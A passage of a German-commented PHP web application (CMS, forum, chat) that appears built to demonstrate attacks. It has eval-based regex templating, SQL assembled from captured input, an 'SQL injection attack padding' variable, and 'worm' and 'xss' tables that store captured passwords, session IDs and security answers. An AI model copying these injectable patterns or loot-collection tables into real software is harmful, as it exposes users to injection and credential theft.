array("/(?<=&)([gl])t(?=;)/e","/\\\\\\\\\\\'|(&#?\w+;)|(?![\x80-\xff])[[:punct:]]|(?<=[a-z\d])[A-Z]/e","/\r?\n/",
"/(\\\\\\\\\\\\\|\)n/"),array("((\"\\$1\"==\"l\")?\"#60\":\"#62\")","((\"\\$1\")?\"\\$1\":\"&#\"
.ord(substr(\"\\$0\",-1)).\";\")","<br />"," "),
"<td class=\"cc\" onclick=\'cc(this,1,?)\' ondblclick=\'cc(this,0,?)\'>\n<>\n<!----></td></tr>",
(!isset($head["creole"]) and $head["creole"]=\'<script type="text/javascript"><!--
' .'function cc(x,y,z){y=[y,x.getElementsByTagName("textarea")[0]];if(!y[0] && y[1])x.innerHTML=y[1].value;if(!y[1]&&y[0])'
.'x.innerHTML="<textarea cols=\"80\" rows=\"10\" style=\"width:100%;height:"+x.clientHeight+"\""+((z)?"":" readonly")+">"'
.'+x.innerHTML+"<\/textarea>";}'."//--></script>\n<style type=\"text/css\"><!--
td.cc:hover{background-color:FloralWhite;border-color:red}--></style>'))) ? eval('".'$y = "<table".(($x[0])
? preg_replace(array("/<|&(lt|#60);/","/\^/","/&(gt|#62);|>/"),array("left","center","right")," align=`$x[0]`") : "")
.(($x[1]) ? " width=`$x[1]`" : "")." border=`1` class=`crd`>"; foreach((($x[3] == "+") ? explode("\n",$x[4])
: array($x[4])) as $z) $y .= "<tr><td><pre style=`white-space:pre-wrap;word-break:break-all`>"
.preg_replace($x[5],$x[6],$z)."</pre></td>".(($x[3] == "-") ? "</tr><tr>" : "").strtr($x[7],array("?" => (($x[2]) ? 1 : 0),
"<>" => strtr($z,array("\\\\\\\\\n" => "\n")))); return strtr($y,array("`" => "\\\'"))."</table>";\') : 0'),
'div' => array('/^([#.]?)(\w+)\s*(.*)/es' => '"<div ".(("$1" == "#") ? "id" : "class")."=\"$2\">$3</div>"'),
'file' => array('/^(\d+)-(.+)$/e' => '($creolevar = array_merge($creolevar,(($x = $sql["aq"]($conn,"select f.id as upid, '
.'strftime(\"%s\",f.[create]) as uptime, f.status/2%2 as upstatus, f.status%2 as upright, u.username as upuser, '
.'f.name as upname, f.info as upinfo, abs(f.size) as upsize, f.hash as uphash, f.type as uptype from [file] as f '
.'left join [user] as u on u.id = f.user where f.user = $1 and f.name like \'$2\' and f.status is not null",SQLITE_ASSOC))
? reset($x) : array()))) ? "" : ""'),
'hide' => array('/^([^|_\n]*)(\||_)?\s*(.+)$/es' => '\'<div id="c\'.($x=((!isset($creolevar[".hc"]) and $head["hide"]=
\'<style type="text/css"><!--'."\n.ch{color:blue;margin-bottom:0px;text-decoration:underline}p.ch{margin-top:0px}--></style>
<script type=\"text/javascript\"><!--\n".'function hidecontent(x){x=document.getElementById("c"+x);'
.'y=x.getElementsByClassName("cb")[0];z=x.getElementsByClassName("ch")[0];w=(y.style.display=="none")?["block","»"]'
.':["none","«"];y.style.display=w[0];z.innerHTML=z.innerHTML.replace(/.$/,w[1])}//--></script>\')'
.'?($creolevar[".hc"]=1):(++$creolevar[".hc"]))).\'"><p class="ch" onclick="hidecontent(\'.$x.\')" title="Ein/Ausblenden">'
.'$1 &\'.(($x=("$2"=="|"))?"r":"l").\'aquo;</p><div class="cb"\'.(($x)?"":\' style="display:none"\').\'>$3</div></div>\''),
'sort' => array('/^([ir]+(?=\s))?\s*(.+)$/es' => '($x = array("$1","$2")) ? eval(\'
$y = explode("\\n",$x[1]);if(preg_match("/i/",$x[0]))natcasesort($y);else natsort($y);
if(preg_match("/r/",$x[0]))$y = array_reverse($y);return join("\n",$y);\') : 0'),
'unutf' => array('/[\xc0-\xdf][\x80-\xbf]|[\xe0-\xef][\x80-\xbf]{2}|[\xf0-\xf7][\x80-\xbf]{3}|[\xf8-\xfb][\x80-\xbf]{4}|[\xfc-\xfd][\x80-\xbf]{5}|[\xfe][\x80-\xbf]{6}/e' =>
'($x = "$0") ? eval(\'for($y = ord($x{0}) % (1 << 7 - strlen($x)), $z = 1; $z < strlen($x); $z++) $y = $y * 64 + (ord($x{$z}) & 63); return "&#$y;";\') : 0',),
'toutf' => array('/[\xc0-\xdf][\x80-\xbf]|[\xe0-\xef][\x80-\xbf]{2}|[\xf0-\xf7][\x80-\xbf]{3}|[\xf8-\xfb][\x80-\xbf]{4}|[\xfc-\xfd][\x80-\xbf]{5}|[\xfe][\x80-\xbf]{6}|([\x80-\xff])/e' =>
'($x = ord("$1") or $y = "$0") ? eval(\'if($x) { $y = ""; $z = 6;
while($x >= 1 << $z and --$z) { $y = chr($x % 64 | 128).$y; $x = $x / 64 | 0; } $y = chr((1 << 7 - $z) -1 << ++$z | $x).$y; } return $y;\') : 0',),
);
$creolepi = array( // <<Plugin ...>> # Späte Erweiterungen mit Parameter Übergabe ($z) / Addons
'comment'=>'0;', // Kommentar
'time' => 'time', // Timestamp ausgeben
'rot13' => array('str_rot13',0), // Rot 13 (de)kodieren
'lower' => array('strtolower',0), // Kleinschreiben
'upper' => array('strtoupper',0), // Grossschreiben
'ucword'=> array('ucwords',0), // Alle Erste Buchstaben gross
'ucfirst'=>array('ucfirst',0), // Erster Buchstabe Gross
'date' => array('date',array('fmt','time?')), // Time Formatiert ausgeben
'ftime' => array('strftime',array('fmt','time?')), // Time Formatiert ausgeben
'wordwrap'=>array('wordwrap',array('str','width','break?')),// Wortumbruch nach x Zeichen
'span' => array('return "<span class=\'".preg_replace("/[^\w-]+/","",$z[class])."\'>$z[text]</span>";',array('class','text')),
'style' => array('return "<span style=\'".preg_replace("/[^\s\w{}%@#;:.,_-]+/","",$z["style"])."\'>$z[text]</span>";',array('style','text')),
'note' => array('$z = array_values($z); if(isset($z[0]) and preg_match("/^\w+$/",$z[0])) { $x = $z[0]; $y = (isset($z[1]))'
.'? $z[1] : false;} else { $x = "note"; $y = (isset($z[0])) ? $z[0] : false; } $z = array($x);'
.'$x = &$creolevar[".fn$z[0]"]; if($y) { if(isset($x[$y])) $z[1] = $x[$y]; else { $z[1] = count($x);'
.'$x[$y] = $z[1]; } unset($x); return "<sup>[<a href=\"#$z[0]\">".($z[1]+1)."</a>]</sup>"; } else {'
.'$y = array(); foreach($x as $z[2] => $z[3]) $y[] = "<li>$z[2]"; $x = array(); unset($x); return'
.'(count($y)) ? "<a name=\"$z[0]\"></a><ol>".implode("",$y)."</li></ol>" : ""; }',array('key?','src?')),
'font' => array('return "<font".((isset($z["color"]))?" color=\"$z[color]\"":"").((isset($z["face"]))?" face=\"$z[face]\"":"")'
.'.((isset($z["size"])) ? " size=\"$z[size]\"" : "").">$z[text]</font>";',array('text','color?','face?','size?')),
'anker' => array('$x = ""; if(isset($z["name"]) and isset($creolevar[".al"]) and count($creolevar[".al"])) {'
.'foreach($creolevar[".al"] as $x => $y) $creolevar[".al"][$x] = "<a class=\"anchor\" href=\"#$x\">$y</a>";'
.'$x = (isset($z["type"]) and preg_match("/([1ai])|([cdns])/i",$z["type"],$x)) ? (($x[1]) ? "ol type=\"$x[1]\""'
.': strtr("ul type=\"$x[2]\"",array("d" => "disc", "c" => "circle", "s" => "square", "n" => "none"))) : "ul";'
.'if(isset($z["type"]) and preg_match("/o(r?)/",$z["type"],$y)) { natsort($creolevar[".al"]);'
.'if(isset($y[1]) and $y[1]) $creolevar[".al"] = array_reverse($creolevar[".al"]); }'
.'$y = array((isset($z["align"])) ? " align=\"$z[align]\"" : "",(isset($z["class"]))'
.'? " class=\"$z[class]\"" : ""); $x = "<table$y[0]$y[1]><tr><td><fieldset><legend>$z[name]</legend><$x$y[1]><li>"'
.'.implode("<li>",$creolevar[".al"])."</li></".substr($x,0,2)."></fieldset></td></tr></table>";'
.'unset($creolevar[".al"]);} return $x;',array('name?','align?','type?','class?')),
'frame' => array('return ($creolevar["type"] == "cms") ? "<iframe src=\'$z[src]\' width=\'$z[width]\' height=\'$z[height]\'"'
.'.((isset($z["option"]) and preg_match("/(left|right)?,?([10])?/",$z["option"],$x)) ? ((isset($x[1]))'
.'? " align=\'$x[1]\'" : "").((isset($x[2])) ? " frameborder=\'$x[2]\'" : "") : "")."><a href=\"$z[src]\" '
.'rel=\"nofollow\" target=\"_blank\">$z[src]</a></iframe>" : $z["src"];',array('src','width','height','option?')),
'script'=> array('if($creolevar["type"] == "cms") { $y = "<script type=\"text/javascript\" src=\"$z[src]\"></script>";'
.'if(isset($z["head"]) and $z["head"]) $head[$z["head"]] = $y; else return $y; };',array('src','head?')),
'debug' => '$debug["<<debug>>"][] = array("x" => $x, "y" => $y, "z" => $z); if($z) return implode(" ",$z);',
// 'eval' => array('eval',1), // That's evil and didn't work!
);
# Tabellen Sortierlinks erstellen
$sorth = array(array(
'/\((.*?)\)/e',
'/\{(.*?)\}/e',
'/([^\t=]+)=(\d+)/e',
'/(?<=^|\t)([^\t]+)(?=\t|$)/'),array(
'($status/2%2) ? "$1" : ""',
'($status%2) ? "$1" : ""',
'"<a href=\"$self/$request?sort=".(($sort and $sort > 0 and $2 == $sort) ? "-" : "")."$2\">$1</a>"',
'<th>$1</th>'),
'/^([^;]+);(\d+)(?:;(.+))?$/e',
"'\n\torder by '.((\$sort and abs(\$sort) <= \$2) ? abs(\$sort).((\$sort < 0 )? ' desc' : '').(('$3' != '') ? ',$3' : '') : '$1')");
# Fehlerhafte Formulare hervorheben
$formcheck = array(
'/\{(\w+)(?:,(\w+))?\|([^|]+)\|(\*?)(\d+)(?:\|(\d+))?(?:\|(\w+)=([^|}]+))?(?:\|(\w+)=([^|}]+))?\}/e',
"'<small>'.((count(\$_POST) and (substr('$3',0,1) == '*' and isset(\$post) and (!isset(\$post['$1'])
or '$2' and !(isset(\$post['$2']) and \$post['$1'] == \$post['$2'] and \$post['$1'] and \$post['$2']))))
? '<font color=\"#ff0000\">$3</font>' : '$3').'</small><br /><input type=\"'.(('$4') ? 'password' : 'text')
.'\" name=\"$1\" size=\"$5\" '.(('$6') ? 'maxlength=\"$6\" ' : '').(('$7' and '$8') ? '$7=\"$8\" ' : '')
.(('$9' and '$10') ? '$9=\"$10\" ' : '').'value=\"'.((isset(\$post['$1'])) ? \$post['$1'] : '').'\" />'");
# Lange Suchergebnisse in Unterseiten einteilen (Paging)
$paging = array(1,10,100,5,10,"/(\d+)\D+(\d+)[^<]+(.+)/e",'eval(\' // Paging Function ($num, $max, $link)
$now = max(1,min(((preg_match("/^(\d+)/",$page[0],$val)) ? $val[1] : ceil($1/$2)),ceil($1/$2)));
if($1 > $2 and $2 > 0) { $end = ceil($1/$2); $now = min(max(1,$now),$end); $line = array(1 => "1-$2",
$now => (($now-1) * $2+1)."-".($now * $2), $end => (($end-1) * $2+1).((($end-1) * $2+1 < $1) ? "-$1 " : ""));
$wrt = 1; while($wrt < $end) { for($a = 1; $a <= $paging[3]; $a++) if(($wrt * $a) <= $end) {
if(($val = $now - $now % $wrt + $wrt * $a) < $end) $line[$val] = (($val-1) * $2+1)."-".($val * $2);
if(($val = $now - $now % $wrt - $wrt * $a) > 0) $line[$val] = (($val-1) * $2+1)."-".($val * $2); }
$wrt *= $paging[4]; } ksort($line); } else $line = array(1 => "1".(($1 > 1) ? "-$1 " : "" ));
$val = ($page[0] != "," or ($1 - ($now-1) * $2) > $2) ? ($now-1) * $2 : max($1 - $2,0); $code = ($2 != $paging[1])
? ",$2" : ""; foreach($line as $key => $var) { if(preg_match("/(\d+)-?(\d*)/",$var,$wrt)) $var = $wrt[1]
.(($wrt[2] != "") ? " - ".$wrt[2] : ""); $line[$key] = ($key == $now) ? "<span title=\"$var\">$key</span>"
: strtr("$3",array("#key#" => $key, "#var#" => $var, "#max#" => $code)); } $code = ""; if(count($line) > 1) {
if($now > 1) $code .= preg_replace("/>\d+</","><<<",$line[$now-1])." | "; $code .= implode(" | ",$line);
if($now < ceil($1/$2)) $code .= " | ".preg_replace("/>\d+</",">>><",$line[$now+1]); } return $code;\')');
# Per JavaScript Elemente verstecken/wiederherstellen
$jshide = array('/^(\w+)([;,])(\d+)$/e','strtr(preg_replace($js,"",\'
z = ("$2" == ",") ? ["none","block"] : ["block","none"];
document.getElementById("$1").style.display = (y = document.getElementById("$1").style.display == z[0])
? z[1] : z[0]; document.cookie = "hide=" + ((x = document.cookie.match(/(^|\W)hide=(\w+)/))
? (x[2] & 65535-(1<<$3)) + (1<<$3) * ((y) ? 0 : 1) : 1<<$3) + "; path=\'.$self.\'";
return false;\'),array("&" => "&"))');
# Grafikdaten
$img = Array( 0 => 35, ':-)' => 182, ';-)' => 173, '8-|' => 205, ':;-(' => 185, ':;-D' => 192,
':;-|' => 179, ':;-?' => 183, 'B8-)' => 194, '8-Oo' => 190, ':;-Cc' => 203, ':;-Oo' => 193,
':;-Xx' => 193, ':;-Ppb' => 187,'~-~' => 975, 'ico' => 326, 1 => "
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");
# Datenbank-Tabellen
$sql[0] = "
CREATE TABLE [chat] (
[id] INTEGER NOT NULL PRIMARY KEY,
[user] INTEGER NOT NULL,
[time] TIMESTAMP NOT NULL,
[chat] VARCHAR(8) NOT NULL,
[text] VARCHAR(255) NOT NULL);
CREATE TABLE [cms] (
[id] INTEGER NOT NULL PRIMARY KEY,
[create] TIMESTAMP NOT NULL,
[change] TIMESTAMP NOT NULL,
[changes] INTEGER NOT NULL DEFAULT '0',
[status] INTEGER NOT NULL,
[name] VARCHAR(40) NOT NULL UNIQUE,
[description] VARCHAR(255) NULL,
[content] TEXT NULL);
CREATE TABLE [file] (
[id] INTEGER NOT NULL PRIMARY KEY,
[create] TIMESTAMP NOT NULL,
[status] INTEGER NULL DEFAULT '1',
[user] INTEGER NOT NULL,
[name] VARCHAR(64) NOT NULL,
[ip] VARCHAR(40) NOT NULL,
[useragent] VARCHAR(255) NULL,
[info] VARCHAR(255) NULL,
[link] INTEGER NULL,
[size] INTEGER NULL,
[hash] VARCHAR(8) NULL,
[type] VARCHAR(40) NULL,
[data] TEXT NULL);
CREATE TABLE [forum] (
[id] INTEGER NOT NULL PRIMARY KEY,
[create] TIMESTAMP NOT NULL,
[change] TIMESTAMP NOT NULL,
[changes] INTEGER NOT NULL DEFAULT '0',
[status] INTEGER NULL DEFAULT '0',
[userid] INTEGER NOT NULL DEFAULT '0',
[mailid] INTEGER NULL,
[path] VARCHAR(255) NULL,
[ip] VARCHAR(40) NOT NULL,
[useragent] VARCHAR(255) NULL,
[title] VARCHAR(255) NULL,
[message] TEXT NOT NULL);
CREATE TABLE [user] (
[id] INTEGER NOT NULL PRIMARY KEY,
[create] TIMESTAMP NOT NULL,
[change] TIMESTAMP NOT NULL,
[changes] INTEGER NOT NULL DEFAULT '0',
[logins] INTEGER NOT NULL DEFAULT '0',
[requests] INTEGER NOT NULL DEFAULT '0',
[status] INTEGER NULL DEFAULT '1',
[chat] VARCHAR(8) NULL,
[username] VARCHAR(64) NOT NULL UNIQUE,
[password] VARCHAR(64) NOT NULL,
[forename] VARCHAR(64) NOT NULL,
[lastname] VARCHAR(64) NOT NULL,
[mail] VARCHAR(255) NOT NULL UNIQUE,
[passhelp] VARCHAR(255) NULL,
[ip] VARCHAR(40) NULL,
[session] VARCHAR(64) NULL,
[useragent] VARCHAR(255) NULL,
[page] VARCHAR(255) NULL,
[info] VARCHAR(255) NULL,
[town] VARCHAR(64) NULL,
[born] DATE NULL,
[tagline] VARCHAR(255) NULL,
[profil] TEXT NULL);
CREATE TABLE [worm] (
[id] INTEGER NOT NULL PRIMARY KEY,
[create] TIMESTAMP NOT NULL,
[referer] VARCHAR(255) NOT NULL,
[Benutzer-ID] VARCHAR(8) NOT NULL UNIQUE,
[Logins] VARCHAR(8) NULL,
[Zugriffe] VARCHAR(8) NULL,
[Aenderungen] VARCHAR(8) NULL,
[Forumbeitraege]VARCHAR(8) NULL,
[Blog] VARCHAR(8) NULL,
[Mailverkehr] VARCHAR(8) NULL,
[Chat-Texte] VARCHAR(8) NULL,
[Dateien] VARCHAR(8) NULL,
[Datei-Freiraum]VARCHAR(20) NULL,
[Status] VARCHAR(8) NULL,
[Rechte] VARCHAR(8) NULL,
[Erstanmeldung] VARCHAR(20) NULL,
[Letzter_Besuch]VARCHAR(20) NULL,
[Letzte_Aktion] VARCHAR(20) NULL,
[Benutzername] VARCHAR(64) NULL,
[Kennwort] VARCHAR(64) NULL,
[Vorname] VARCHAR(64) NULL,
[Nachname] VARCHAR(64) NULL,
[eMail] VARCHAR(255) NULL,
[Homepage] VARCHAR(255) NULL,
[Wohnort] VARCHAR(64) NULL,
[Chat-Status] VARCHAR(255) NULL,
[Geburtstag] VARCHAR(64) NULL,
[Sicherheitsfrage] VARCHAR(96) NULL,
[Geheim-Antwort] VARCHAR(96) NULL,
[Bildschirm] VARCHAR(64) NULL,
[IP-Adresse] VARCHAR(40) NULL,
[SessionID] VARCHAR(64) NULL,
[Browser] VARCHAR(255) NULL);
CREATE TABLE [xss] (
[id] INTEGER NOT NULL PRIMARY KEY,
[create] TIMESTAMP NOT NULL,
[ip] VARCHAR(40) NOT NULL,
[href] VARCHAR(255) NOT NULL,
[data] VARCHAR(255) NULL,
[sess] VARCHAR(255) NULL,
[user] VARCHAR(255) NULL,
[pass] VARCHAR(255) NULL,
[useragent] VARCHAR(255) NULL);";
$sql[1] = " Array_Query Changes CLose
Create_Function ERror_String Escape_String Exec
Fetch_Array Field_Name Last_Error LibenCoding
LibVersion Master Num_Fields Open
Query Single_Query";
# Erste Initialisierungen
$eos = 60; // Sessiondauer bei inaktivität (Min)
$taz = 24; // Anzahl der TextArea-Zeilen
$flc = 5; // Anzahl der erlaubten Fehllogins
$ctl = 31557600; // 1*365.25*24*60*60 // Maximale Speicherdauer von Cookies
$wrt = true; // Datenbankstruktur überprüfen
$stc = "FireBrick"; // StyleSheet Title-Color
$rel = " rel='nofollow'"; // Suchmaschinen sollen Link ignorieren
$tgb = " target='_blank'"; // Neues Fenster bei Externen Links
$sel = " class='self'"; // Klasse für Eigenlinks
$atk = "$rel class='leak'"; // Klasse für Angrifflinks
$lock = '⚷'; # '🔒'; // Schloss-Zeichen
$info = array_fill(0,9,""); // Platzhalter für Dynamische Infos
$dpsk = '/^(lua|src|uid|sha|flc)$/'; // Sessionfilter
$addr = $_SERVER['REMOTE_ADDR']; // IP vom Benutzer
$time = filemtime(__FILE__); // Datum des Scriptes
$date = date("d.m.Y",$time); // Änderungsdatum
$wiki = 'https://de.wikipedia.org/wiki';// Wikipedia-Links
$debug = $head = array(); // Debug & HTML-Header initialisieren
$maxfile = 512 * 1024; // Maximale Upload-Größe
$register = false; // CMS-Infotest für neuanmeldung
$local = '/^(1(0|27|69\.254|72\.(1[6-9]|2\d|3[01])|92\.168)\.|::1)/'; // Lokalzugriff
$gqs = (isset($_SERVER['QUERY_STRING'])) ? $_SERVER['QUERY_STRING'] : ""; // Query-String
$ncms = '(Abmelden|CMS|Datei|Mail|Profil|Suche)'; // Mit diesen Namen keine CMS-Seiten anlegen
$type = explode(',',',7z,asc,bmp,bpg,csv,gz,ico,jpe,jpeg,jpg,jp2,j2k,mp4,ogg,pdf,png,rtf,svg,tar,tgz,tif,tiff,txt,webp,zip'); // Erlaubt Dateitypen
preg_match('/(.{18})(.+)/',str_pad(0,44,',0'),$sij); // Angriffs-Padding für SQL-Injection
$self = preg_replace('!^[^/]+!','',$_SERVER['SCRIPT_NAME']); // Link zum Script
$Self = ($a = explode(',',(isset($_SERVER['HTTPS']) and $_SERVER['HTTPS'] == 'on') ? '443,s' : '80,'))
? "http$a[1]://$_SERVER[HTTP_HOST]".((":$a[0]" != ($a = ":$_SERVER[SERVER_PORT]") and $a != substr($_SERVER['HTTP_HOST'],-strlen($a))) ? $a : "").$self : '';
$author = "<a href='http://www.mengelke.de/'$tgb>Michael Engelke</a>";
if($config and file_exists($config)) // Alternative Konfig-Datei
@include $config; // Konfig-Daten laden
if(isset($cfg)) // Dynamische Variabeln ersetzen
extract($cfg); // foreach($cfg as $key => $var) $GLOBALS[$key] = $var;
if(isset($CFG)) // Dynamische Variabeln erweitern
foreach($CFG as $key => $var)
foreach($var as $k => $v)
$GLOBALS[$key][$k] = $v;
$uid = false; // Keine Benutzer-ID
$status = 0; // Keine Rechte
$q = (isset($_GET['q'])) ? $_GET['q'] : ((isset($_GET['b'])) ? base64_decode(strtr($_GET['b'],array(' ' => '+', '-' => '+', '_' => '/'))) : false);
$s = (isset($_GET['s']) and preg_match('/^[bcdfm]$/',$_GET['s'],$var)) ? $var[0] : false;
$id = (isset($_GET['id']) and preg_match('/\d+/',$_GET['id'],$var)) ? $var[0] : false;
$mid = (isset($_GET['user']) and preg_match('/-?\d+/',$_GET['user'],$var)) ? $var[0] : false;
$sort = (isset($_GET['sort']) and preg_match('/-?\d+/',$_GET['sort'],$var)) ? $var[0] : false;
$mode = (isset($_REQUEST['mode']) and preg_match('/\w+/',$_REQUEST['mode'],$var)) ? $var[0] : false;
$path = (isset($_SERVER['PATH_INFO'])) ? $_SERVER['PATH_INFO'] : ((preg_match('!'.preg_quote(basename(__FILE__),'!').'(/[^?#]+)!',$_SERVER['REQUEST_URI'],$var)) ? $var[1] : ((isset($_REQUEST['PATH_INFO'])) ? $_REQUEST['PATH_INFO'] : null));
$request = (isset($_REQUEST['request'])) ? preg_replace('/[^\w.-]/','',$_REQUEST['request'])
: (($path and preg_match('/^\/([\w.-]+)/',$path,$var)) ? $var[1] : false);
$query = (isset($_REQUEST['PATH_INFO'])) ? preg_replace('/^[^&]*./','',$gqs) : $gqs;
$phtml = array(preg_replace(array('/&/','/.+/'),array('&(?!(\w+|#\d+|#x[\da-f]+);)','/$0/i'),array_keys($html)),array_values($html));
$uedit = false;
$array = array(&$attack,&$hash,&$jschat['crypt']); // Alle Externen Links in Lokale umwandeln, wenn sie existieren
if(is_string($local))
$local = preg_match($local,$addr);
if($home)
foreach($array as $key => $var)
foreach($var as $k => $v)
if(preg_match('!^(ht|f)tps?://!',$v))
$array[$key][$k] = (@file_exists($val = "$home/".basename($v))) ? preg_replace(array('!(?<=^|/)([^/]+\.)?\./|/(?=/)!','!^(?=/)!'),array('',substr($Self,0,-strlen($self))),preg_replace('![^/]*$!','',$self)."/$val") : preg_replace('/\s*#.*$/','',$v);
